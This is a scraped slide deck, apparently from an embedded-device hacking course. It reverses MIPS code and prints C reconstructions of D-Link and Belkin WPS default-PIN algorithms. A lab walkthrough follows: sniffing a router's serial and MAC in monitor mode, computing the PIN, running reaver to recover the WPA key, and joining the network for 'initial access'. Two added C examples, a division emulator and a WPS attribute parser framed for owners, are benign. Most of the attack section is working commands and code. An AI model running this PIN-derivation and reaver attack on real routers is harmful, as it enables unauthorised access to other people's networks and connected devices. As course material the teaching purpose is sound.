Right shifting a number by 1 has the effect of dividing that number by 2.
Therefore right shifting a number by 33 has the effect of
dividing that number by 2^33 = 8589934592
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
![Page 106: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/106.jpg)
Observations
954437177 (decimal) = 0x38E38E39 (hex)
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
= (a3)(954437177/8589934592)
![Page 107: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/107.jpg)
Observations
1/9 ≈ 954437177/8589934592
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
= (a3)(954437177/8589934592)
= (a3)(1/9)
![Page 108: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/108.jpg)
Observations
As the above example illustrates, the compiled code uses operations such as a multiply by a constant and shifts in place of a division
What looks complex may be able to be decompiled into something much simpler
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly / C code
v0 = ($a3)/9
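The arithmetic walked through above, as an added example that is not from the slides: a C emulation of the four MIPS instructions (64-bit hi:lo product, mfhi, srl), a sampled check that the result equals a3 / 9 across the 32-bit range, and a helper that recovers the divisor from any (magic constant, extra shift) pair, which goes beyond the single /9 instance shown here. The 0xCCCCCCCD / shift 3 pair is the well-known unsigned /10 constant used as a second check; function names are my own.

```c
/* Added example (not from the slides): emulate the reversed MIPS sequence
 *   li    $v0, 0x38E38E39
 *   multu $a3, $v0
 *   mfhi  $v0
 *   srl   $v0, 1
 * and confirm that it really is "v0 = a3 / 9" for 32-bit inputs. A second
 * helper turns any (magic, shift) pair back into the divisor the compiler
 * started from, which is the general trick the slides show one instance of.
 * Function names are my own, not identifiers from the firmware. */
#include <stdint.h>
#include <stdio.h>

/* Faithful emulation of the four instructions. multu writes the 64-bit
 * product into hi:lo, mfhi reads the upper 32 bits (an implicit >> 32),
 * and the srl by 1 completes the >> 33 derived on the slides. */
static uint32_t mips_div9(uint32_t a3)
{
    uint32_t v0 = 0x38E38E39u;                 /* li    $v0, 0x38E38E39 */
    uint64_t product = (uint64_t)a3 * v0;      /* multu $a3, $v0  -> hi:lo */
    uint32_t hi = (uint32_t)(product >> 32);   /* mfhi  $v0 */
    return hi >> 1;                            /* srl   $v0, 1 */
}

/* Recover the divisor from a magic constant. The compiler picked
 * magic ~= 2^(32 + extra_shift) / d, so d ~= 2^(32 + extra_shift) / magic.
 * The 32 is the implicit shift done by mfhi; extra_shift is the srl that
 * follows it (1 for the snippet above). Valid for extra_shift <= 31. */
static unsigned recover_divisor(uint32_t magic, unsigned extra_shift)
{
    double pow2 = (double)((uint64_t)1 << (32 + extra_shift));
    return (unsigned)(pow2 / (double)magic + 0.5);   /* round to nearest */
}

/* Compare the emulation with plain integer division for every stride-th
 * 32-bit value plus the top edge; returns the number of mismatches.
 * stride = 1 is exhaustive (2^32 iterations); stride must be >= 1. */
static uint64_t count_mismatches(uint32_t stride)
{
    uint64_t bad = 0;
    uint64_t a3;                      /* 64-bit counter so the loop terminates */
    for (a3 = 0; a3 <= UINT32_MAX; a3 += stride)
        if (mips_div9((uint32_t)a3) != (uint32_t)a3 / 9u)
            bad++;
    if (mips_div9(UINT32_MAX) != UINT32_MAX / 9u)
        bad++;
    return bad;
}

int main(void)
{
    uint32_t samples[] = { 0, 8, 9, 17, 18, 0x12345678u, UINT32_MAX };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("a3 = %10u  emulated = %10u  a3/9 = %10u\n",
               samples[i], mips_div9(samples[i]), samples[i] / 9u);
    printf("divisor recovered from 0x38E38E39 with srl 1: %u\n",
           recover_divisor(0x38E38E39u, 1));
    printf("divisor recovered from 0xCCCCCCCD with srl 3: %u\n",
           recover_divisor(0xCCCCCCCDu, 3));
    printf("mismatches over a sampled sweep: %llu\n",
           (unsigned long long)count_mismatches(1000003u));
    return 0;
}
```

The equality is exact rather than approximate because 9 * 0x38E38E39 = 2^33 + 1, so the rounding error never reaches the next integer for any 32-bit input.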
![Page 109: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/109.jpg)
Luckily someone else (Craig) did all the grunt work in decompiling the disassembly for us
But we’ve seen how the general process for reversing works, so in theory we could do it
On the next slides, we’ll show the complete C implementation of the get_default_pin algorithm
Reverse algorithm segment into C code
b. Reversing the entire algorithm
![Page 110: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/110.jpg)
get_default_pin (D-Link router)

    unsigned int generate_default_pin(char *buf)
    {
        char *mac;
        char mac_address[32] = { 0 };
        unsigned int oui, nic, pin;

        /* Get a pointer to the WAN MAC address */
        mac = lockAndGetInfo_log()->wan_mac_address;

        /*
         * Create a local, NULL-terminated copy of the WAN MAC (simplified from
         * the original code's sprintf/memmove loop).
         */
        sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0], mac[1], mac[2], …… mac[11]);

        sscanf(mac_address, "%06X%06X", &oui, &nic);

        /* Do some XOR munging of the NIC. */
        pin = (nic ^ 0x55AA55);
        pin = pin ^ (((pin & 0x0F) << 4) +
                     ((pin & 0x0F) << 8) +
                     ((pin & 0x0F) << 12) +
                     ((pin & 0x0F) << 16) +
                     ((pin & 0x0F) << 20));

        /*
         * The largest possible remainder for any value divided by 10,000,000
         * is 9,999,999 (7 digits). The smallest possible remainder is,
         * obviously, 0.
         */
        pin = pin % 10000000;

        /* The pin needs to be at least 7 digits long */
        if (pin < 1000000)
        {
            /*
             * The largest possible remainder for any value divided by 9 is
             * 8; hence this adds at most 9,000,000 to the pin value, and at
             * least 1,000,000. This guarantees that the pin will be 7 digits
             * long, and also means that it won't start with a 0.
             */
            pin += ((pin % 9) * 1000000) + 1000000;
        }

        /*
         * The final 8 digit pin is the 7 digit value just computed, plus a
         * checksum digit. Note that in the disassembly, the wps_pin_checksum
         * function is inlined (it's just the standard WPS checksum implementation).
         */
        pin = ((pin * 10) + wps_pin_checksum(pin));

        sprintf(buf, "%08d", pin);

        return pin;
    }
![Page 111: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/111.jpg)
We could follow a similar process to reverse the Belkin Pin algorithm
Yet again, Craig has spared us the trouble
On the next slide is the reversed C implementation of the Belkin algorithm
Reverse algorithm segment into C code
c. Reversing the Belkin Pin Generation Algorithm
![Page 112: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/112.jpg)
get_default_pin (Belkin router)

    #include <string.h>

    /* char2int() and wps_checksum() are helper functions not reproduced on the slide */

    /* Munges the MAC and serial numbers to create a WPS pin */
    int pingen(char *mac, char *serial)
    {
        #define NIC_NIBBLE_0 0
        #define NIC_NIBBLE_1 1
        #define NIC_NIBBLE_2 2
        #define NIC_NIBBLE_3 3

        #define SN_DIGIT_0 0
        #define SN_DIGIT_1 1
        #define SN_DIGIT_2 2
        #define SN_DIGIT_3 3

        int sn[4], nic[4], mac_len, serial_len;
        int k1, k2, pin, p1, p2, p3, t1, t2;

        mac_len = strlen(mac);
        serial_len = strlen(serial);

        /* Get the four least significant digits of the serial number */
        sn[SN_DIGIT_0] = char2int(serial[serial_len-1]);
        sn[SN_DIGIT_1] = char2int(serial[serial_len-2]);
        sn[SN_DIGIT_2] = char2int(serial[serial_len-3]);
        sn[SN_DIGIT_3] = char2int(serial[serial_len-4]);

        /* Get the four least significant nibbles of the MAC address */
        nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]);
        nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]);
        nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]);
        nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);

        k1 = (sn[SN_DIGIT_2] + sn[SN_DIGIT_3] + nic[NIC_NIBBLE_0] + nic[NIC_NIBBLE_1]) % 16;
        k2 = (sn[SN_DIGIT_0] + sn[SN_DIGIT_1] + nic[NIC_NIBBLE_3] + nic[NIC_NIBBLE_2]) % 16;

        pin = k1 ^ sn[SN_DIGIT_1];
        t1 = k1 ^ sn[SN_DIGIT_0];
        t2 = k2 ^ nic[NIC_NIBBLE_1];
        p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1;
        p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2;
        p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2];

        k1 = k1 ^ k2;

        pin = (pin ^ k1) * 16;
        pin = (pin + t1) * 16;
        pin = (pin + p1) * 16;
        pin = (pin + t2) * 16;
        pin = (pin + p2) * 16;
        pin = (pin + k1) * 16;
        pin += p3;

        pin = (pin % 10000000) - (((pin % 10000000) / 10000000) * k1);

        return (pin * 10) + wps_checksum(pin);
    }
![Page 113: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/113.jpg)
Lab 2: Q&A
Q: Why are weaknesses in the implementation of a security design not discovered before the product is released?
A: Companies care more about time-to-market
A: They subscribe to the notion of security through obscurity
Q: How long does the reverse engineering process take?
A: Depends on the device and the skills of the personnel
A: Charlie and Chris (Chrysler Jeep hack) said it took them over 3.5 months and they are pretty experienced
![Page 114: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/114.jpg)
Lab 2: Q&A
Q: Is the reverse process always this tedious?
A: In general…yes, if not more so.
Q: What things can make reversing harder?
A: Stripped binaries (e.g. no symbols)
A: Anti-debugging techniques
A: Code obfuscation
A: Writing the original code in C++
Q: What is an ELF (Executable and Linkable Format)?
A: Standard file format on Unix-like systems
![Page 115: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/115.jpg)
Lab 2: Q&A
Q: Why is MIPS still popular in embedded devices?
A: Licensing costs for MIPS are cheaper than for ARM
Q: Why couldn’t we decompile using IDA Pro?
A: IDA only supports ARM and x86/64
A: No reliable decompilers for MIPS in general.
![Page 116: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/116.jpg)
Lab 2: Reversing with IDA Pro
Additional Resources
Reversing D-Link’s WPS Pin Algorithm: http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
![Page 117: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/117.jpg)
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Outline
![Page 118: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/118.jpg)
Lab 3: Obtaining initial access
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to the router and the connected clients
Extract firmware to find pin algorithm → Reverse engineer algorithm → Obtain inputs to algorithm by sniffing traffic → Generate pin and use reaver to get password
Lab 3 covers the last two steps
![Page 119: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/119.jpg)
Description In this lab, we will explore how to use our knowledge of the pin generation
algorithm to derive the WPA Key
Specifically, we will first need to acquire relevant input information into the algorithm by using Wireshark, and then run the algorithm to compute the WPS PIN
Then we’ll need to use Reaver to derive the WPA key from the WPS PIN
Lab 3: Obtaining initial access
![Page 120: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/120.jpg)
Steps for Obtaining initial access
1. Acquire serial and wlan mac w/ Wireshark
2. Compile & execute wps pin generation algorithm
3. Run Reaver to obtain the WPA key
4. Connect to the router utilizing obtained WPA key
Lab 3: Obtaining initial access
![Page 121: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/121.jpg)
1) Acquire Serial and WLAN MAC with Wireshark (Next Slides)
Lab 3: Obtaining initial access
![Page 122: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/122.jpg)
We’ll need a wifi adapter that supports monitor mode
Monitor mode enables monitoring of all traffic received
Normally, the wifi adapter will filter out traffic not destined for it
An example wifi adapter that supports monitor mode is the TP-LINK TL-WN722N
(pictured above); cost about $12
Acquiring serial and wlan information
a. Attach Wifi adapter (monitor mode support) to PC
![Page 123: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/123.jpg)
b. Connect wifi adapter to guest Kali-Linux VM
Acquiring serial and wlan information
Click this
![Page 124: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/124.jpg)
b. Connect wifi adapter to guest Kali-Linux VM
Acquiring serial and wlan information
Click This
![Page 125: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/125.jpg)
c. Get the name of the wireless interface (e.g. wlanx), where x is 0-9
Acquiring serial and wlan information
$ sudo iwconfig
Wireless Interface Name
![Page 126: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/126.jpg)
d. Bring the wireless interface down so we can configure it
Acquiring serial and wlan information
$ sudo ifconfig wlanx down
![Page 127: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/127.jpg)
e. Change the wifi mode to monitor
Acquiring serial and wlan information
$ sudo iwconfig wlan0 mode monitor
![Page 128: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/128.jpg)
f. Set the channel of the wireless interface to channel y, where y is in 1-12
Acquiring serial and wlan information
$ sudo iwconfig wlan0 channel %y%
![Page 129: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/129.jpg)
g. Bring the wireless interface back up
Acquiring serial and wlan information
$ sudo ifconfig wlan0 up
![Page 130: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/130.jpg)
h. Launch Wireshark
Acquiring serial and wlan information
$ sudo wireshark
![Page 131: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/131.jpg)
h. Click on wireless interface wlanx
Acquiring serial and wlan information
Click this
![Page 132: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/132.jpg)
i. Click Start
Acquiring serial and wlan information
Click this
![Page 133: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/133.jpg)
i. Click Start
Acquiring serial and wlan information
![Page 134: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/134.jpg)
i. (Continued)
Acquiring serial and wlan information
![Page 135: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/135.jpg)
j. Wait approximately 1-3 minute(s) as Wireshark captures packets
Acquiring serial and wlan information
![Page 136: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/136.jpg)
k. Stop the capture
Acquiring serial and wlan information
Click to stop Capture
![Page 137: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/137.jpg)
l. Find a probe response message from Belkin_xx:xx:xx and click on it
Acquiring serial and wlan information
![Page 138: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/138.jpg)
m. Click on “IEEE 802.11 wireless LAN management” to expand the selection
Acquiring serial and wlan information
Click to expand
![Page 139: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/139.jpg)
n. (After click)
Acquiring serial and wlan information
![Page 140: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/140.jpg)
o. Click on “Tagged parameters” to expand the selection
Acquiring serial and wlan information
After Click
![Page 141: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/141.jpg)
p. Click on “Vendor Specific” to expand the selection
Acquiring serial and wlan information
After Click
![Page 142: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/142.jpg)
q. Locate and record the Serial Number
Acquiring serial and wlan information
Serial Number
![Page 143: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/143.jpg)
r. Locate and Record wlan MAC address of the Belkin router
Acquiring serial and wlan information
MAC Address
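The Wireshark walk-through above (Vendor Specific element, then Serial Number) done in code, as an added example that is not from the slides: a small C parser for the Tagged parameters of a probe response or beacon body that reports which WPS (WSC) attributes an access point broadcasts, so an AP owner can check whether the model and serial number that feed a pin generator are visible to anyone in radio range. The WPS OUI 00:50:F2 with OUI type 4 and the attribute IDs (0x1021 Manufacturer, 0x1023 Model Name, 0x1042 Serial Number) come from the WSC spec; the sample element bytes are constructed, not captured from a real router, and the struct and function names are my own.

```c
/* Added example, not part of the slides: parse the "Tagged parameters" of a
 * probe response / beacon body and report which WPS (WSC) attributes the
 * access point broadcasts. Attribute IDs and the WPS OUI/type follow the
 * WSC spec; the sample bytes below are constructed, not a real capture. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TAG_VENDOR_SPECIFIC   0xDD
#define WSC_ATTR_MANUFACTURER 0x1021
#define WSC_ATTR_MODEL_NAME   0x1023
#define WSC_ATTR_SERIAL       0x1042

/* OUI 00:50:F2 followed by OUI type 4 identifies the WPS element. */
static const uint8_t WPS_OUI_TYPE[4] = { 0x00, 0x50, 0xF2, 0x04 };

struct wps_info {
    int  found;            /* 1 when a WPS element was present */
    char manufacturer[65]; /* empty string when the attribute is absent */
    char model[33];
    char serial[33];
};

/* Copy a WSC string attribute into a fixed buffer, truncating if needed. */
static void copy_attr(char *dst, size_t dst_size, const uint8_t *src, size_t len)
{
    if (len >= dst_size)
        len = dst_size - 1;
    memcpy(dst, src, len);
    dst[len] = '\0';
}

/* Walk WSC attributes: 2-byte big-endian type, 2-byte big-endian length. */
static void parse_wsc(const uint8_t *p, size_t len, struct wps_info *out)
{
    size_t off = 0;
    out->found = 1;
    while (off + 4 <= len) {
        uint16_t type = (uint16_t)((p[off] << 8) | p[off + 1]);
        uint16_t alen = (uint16_t)((p[off + 2] << 8) | p[off + 3]);
        off += 4;
        if (off + alen > len)
            break;                                  /* truncated attribute: stop */
        if (type == WSC_ATTR_MANUFACTURER)
            copy_attr(out->manufacturer, sizeof out->manufacturer, p + off, alen);
        else if (type == WSC_ATTR_MODEL_NAME)
            copy_attr(out->model, sizeof out->model, p + off, alen);
        else if (type == WSC_ATTR_SERIAL)
            copy_attr(out->serial, sizeof out->serial, p + off, alen);
        off += alen;
    }
}

/* Walk 802.11 information elements: 1-byte id, 1-byte length, value.
 * Returns 0 on success, -1 if an element runs past the end of the buffer. */
static int audit_tagged_params(const uint8_t *ies, size_t len, struct wps_info *out)
{
    size_t off = 0;
    memset(out, 0, sizeof *out);
    while (off + 2 <= len) {
        uint8_t id = ies[off], elen = ies[off + 1];
        off += 2;
        if (off + elen > len)
            return -1;
        if (id == TAG_VENDOR_SPECIFIC && elen >= 4 &&
            memcmp(ies + off, WPS_OUI_TYPE, 4) == 0)
            parse_wsc(ies + off + 4, elen - 4, out);
        off += elen;
    }
    return 0;
}

/* 1 if the AP broadcasts a WPS Serial Number attribute, else 0. */
static int leaks_serial(const uint8_t *ies, size_t len)
{
    struct wps_info info;
    if (audit_tagged_params(ies, len, &info) != 0)
        return 0;
    return info.found && info.serial[0] != '\0';
}

/* Constructed sample: an SSID element followed by a WPS vendor-specific
 * element carrying Manufacturer, Model Name and Serial Number. */
static const uint8_t SAMPLE_IES[] = {
    0x00, 0x06, 'M', 'y', 'W', 'i', 'F', 'i',                      /* SSID "MyWiFi" */
    0xDD, 0x24, 0x00, 0x50, 0xF2, 0x04,                            /* Vendor Specific: WPS */
    0x10, 0x21, 0x00, 0x06, 'V', 'e', 'n', 'd', 'o', 'r',          /* Manufacturer */
    0x10, 0x23, 0x00, 0x06, 'R', 'o', 'u', 't', 'e', 'r',          /* Model Name */
    0x10, 0x42, 0x00, 0x08, '1', '2', '3', '4', 'A', 'B', 'C', 'D', /* Serial Number */
};

int main(void)
{
    struct wps_info info;
    if (audit_tagged_params(SAMPLE_IES, sizeof SAMPLE_IES, &info) != 0) {
        puts("malformed element list");
        return 1;
    }
    printf("WPS element: %s\n", info.found ? "present" : "absent");
    printf("manufacturer=\"%s\" model=\"%s\" serial=\"%s\"\n",
           info.manufacturer, info.model, info.serial);
    printf("serial number broadcast: %s\n",
           leaks_serial(SAMPLE_IES, sizeof SAMPLE_IES) ? "yes" : "no");
    return 0;
}
```

An AP with WPS disabled carries no such element, so leaks_serial() returns 0 for it; that is the configuration change that removes the inputs this lab collects.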
![Page 144: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/144.jpg)
2. Compile & execute wps pin generation algorithm (Next Slides)
Lab 3: Obtaining initial access
![Page 145: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/145.jpg)
a. Download pingen algorithm source from here and save to home dir
Compile & Execute WPS pingen Algorithm
![Page 146: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/146.jpg)
b. Compile pingen.c
Compile & Execute WPS pingen Algorithm
$ sudo gcc -Wall pingen.c -o pingen
![Page 147: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/147.jpg)
c. Executing the pingen binary to see usage
Compile & Execute WPS pingen Algorithm
$ ./pingen
![Page 148: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/148.jpg)
d. Pass in appropriate parameters and execute pingen to get pin
Compile & Execute WPS pingen Algorithm
$ ./pingen xxxx xxxx
Default Pin
![Page 149: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/149.jpg)
e. The Results
Compile & Execute WPS pingen Algorithm
The Pin
![Page 150: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/150.jpg)
Default Pin
e. The Results
Compile & Execute WPS pingen Algorithm
The Pin
![Page 151: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/151.jpg)
3. Run Reaver to obtain WPA Key
(Next Slides)
Lab 3: Obtaining initial access
![Page 152: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/152.jpg)
a. Executing Reaver with appropriate arguments
Run Reaver to Obtain WPA Key
reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -T 5 -vv
![Page 153: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/153.jpg)
b. Wait for the Results (can take up to 30 seconds)
Run Reaver to Obtain WPA Key
WPA KEY
![Page 154: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/154.jpg)
4. Connect to the router by utilizing
the obtained WPA key
(Next Slides)
Lab 3: Obtaining initial access
![Page 155: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/155.jpg)
a. Bring the wireless interface down so we can configure it
Connect to router with WPA key
$ sudo ifconfig wlanx down
![Page 156: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/156.jpg)
b. Change the wifi mode to managed
Connect to router with WPA key
$ sudo iwconfig wlan0 mode managed
![Page 157: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/157.jpg)
c. Bring the wireless interface back up
Connect to router with WPA key
$ sudo ifconfig wlan0 up
![Page 158: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/158.jpg)
c. Wait about a minute or so for the interface to be brought up
Connect to router with WPA key
![Page 159: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/159.jpg)
d. Click the networking icon
Connect to router with WPA key
Click this icon
![Page 160: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/160.jpg)
e. Select the Appropriate Access Point
Connect to router with WPA key
Click on the appropriate AP
![Page 161: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/161.jpg)
f. Enter the WPA key and connect
Connect to router with WPA key
Enter WPA Key
![Page 162: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/162.jpg)
g. Wait while connection occurs
Connect to router with WPA key
Connecting…
![Page 163: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/163.jpg)
h. Connection is established
Connect to router with WPA key
Success!!
![Page 164: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/164.jpg)
h. Connect to web management server (Obtained Initial Access!!)
Connect to router with WPA key
![Page 165: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/165.jpg)
i. Log into web management interface (Preview of next session)
Connect to router with WPA key
We’ll figure out how to gain admin access in Session II
![Page 166: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/166.jpg)
Lab 3: Q&A
Q: What’s the difference between monitor mode and promiscuous mode?
A: Promiscuous mode allows packets to be sniffed only on the AP the wifi adapter is currently connected to
A: Monitor mode allows all packets on a particular channel to be sniffed if the packets are in listening range
Q: Are there any other interesting wifi modes?
A: Master mode, which allows the wifi adapter to behave as an access point
A: The TP Link adapter also supports this mode
![Page 167: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/167.jpg)
![Page 168: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/168.jpg)
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to the router and the connected clients
Extract firmware to find pin algorithm (Lab 1) → Reverse engineer algorithm (Lab 2) → Obtain inputs to algorithm by sniffing traffic (Lab 3) → Generate pin and use reaver to get password (Lab 3)
![Page 169: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/169.jpg)
![Page 172: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/172.jpg)
Recap: Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router (Session I)
